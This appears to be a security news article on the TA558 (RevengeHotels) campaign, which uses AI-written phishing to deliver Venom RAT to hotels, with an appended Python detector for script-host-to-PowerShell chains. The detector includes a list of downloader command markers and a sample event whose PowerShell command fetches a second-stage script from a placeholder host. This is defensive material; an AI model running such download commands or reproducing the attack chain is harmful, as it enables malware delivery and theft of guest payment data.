TA558 Deploys Venom RAT via AI-Generated Phishing Targeting Hotels

TA558 Targets Hotels

The TA558 group, also known as RevengeHotels, attacks hotels in Brazil. It uses AI-generated phishing emails to deploy Venom RAT. The campaign started in summer 2025.

Attackers use AI to craft phishing emails. These emails mimic invoices and job offers. Consequently, they appear legitimate. This tricks hotel staff into clicking links.

The emails deliver JavaScript payloads. These scripts fetch PowerShell downloaders, which retrieve additional malware. This leads to Venom RAT deployment.

Venom RAT’s Features

Venom RAT steals credit card data. It acts as a reverse proxy. Moreover, it includes anti-kill protections. This ensures uninterrupted operation.

The malware blocks process termination. It checks for security tools every 50 milliseconds and kills analysis programs. This maintains its presence.

Venom RAT modifies system settings. It uses registry changes for persistence. Additionally, it marks itself as critical. This prevents shutdown attempts.

USB Spread and AV Evasion

The malware spreads via USB drives. It disables antivirus programs. For example, it tampers with task schedulers. This bypasses security measures.

The campaign focuses on hotel systems. It steals data from booking platforms. Moreover, it targets Spanish-speaking regions. This expands its reach.

AI tools generate the attack scripts. They produce heavily commented code that mimics legitimate formats. This enhances evasion.

TA558 refines its attack methods. It adapts to new regions. Therefore, it poses a growing risk. AI use makes attacks more effective.

Preventing TA558 Attacks

To stop TA558, train staff to spot phishing emails. Use advanced email filters. Additionally, use real-time threat monitoring to detect the scripts. Keep antivirus updated to block RATs. By staying vigilant, hotels can protect guest data.
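
One way to monitor for the JavaScript-to-PowerShell stage described above is to flag process-creation records where a Windows script host starts PowerShell. This is an added example, not code from the original article or from any vendor; the field names follow Sysmon Event ID 1, and the marker list, host names, paths and URL are constructed assumptions.

```python
import ntpath

# Script hosts that run an emailed .js file, and the interpreters they rarely need to start.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Heuristic command-line markers of a downloader (assumed list, tune per environment).
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest",
                    "net.webclient", "-encodedcommand", "-enc ")

# Constructed sample records shaped like Sysmon Event ID 1 (process creation).
SAMPLE_EVENTS = [
    {"Computer": "FRONTDESK-01",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "ParentCommandLine": r'wscript.exe "C:\Users\reception\Downloads\invoice.js"',
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Invoke-WebRequest "
                    "-Uri http://example.invalid/stage2 -OutFile s.ps1"},
    {"Computer": "BACKOFFICE-02",  # admin opening PowerShell by hand: not flagged
     "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": "explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"Computer": "FRONTDESK-03",  # script host starting PowerShell, no download marker
     "ParentImage": r"C:\Windows\System32\cscript.exe",
     "ParentCommandLine": r"cscript.exe C:\Scripts\logon.js",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\map-drives.ps1"},
]

def _exe(path):
    """Lower-cased executable name from a Windows path."""
    return ntpath.basename(path or "").lower()

def score_event(event):
    """Return an alert dict for a script host -> PowerShell chain, else None."""
    parent, child = _exe(event.get("ParentImage")), _exe(event.get("Image"))
    if parent not in SCRIPT_HOSTS or child not in POWERSHELL:
        return None
    cmd = (event.get("CommandLine") or "").lower()
    hits = [m.strip() for m in DOWNLOAD_MARKERS if m in cmd]
    return {"host": event.get("Computer", "unknown"),
            "severity": "high" if hits else "medium",
            "chain": f"{parent} -> {child}",
            "markers": hits,
            "script": event.get("ParentCommandLine", "")}

def scan(events):
    """Score every record and keep only the alerts."""
    return [a for a in map(score_event, events) if a]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Medium alerts (a script host starting PowerShell without a download marker) still deserve review, since front-desk workstations seldom have a business reason for that chain.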
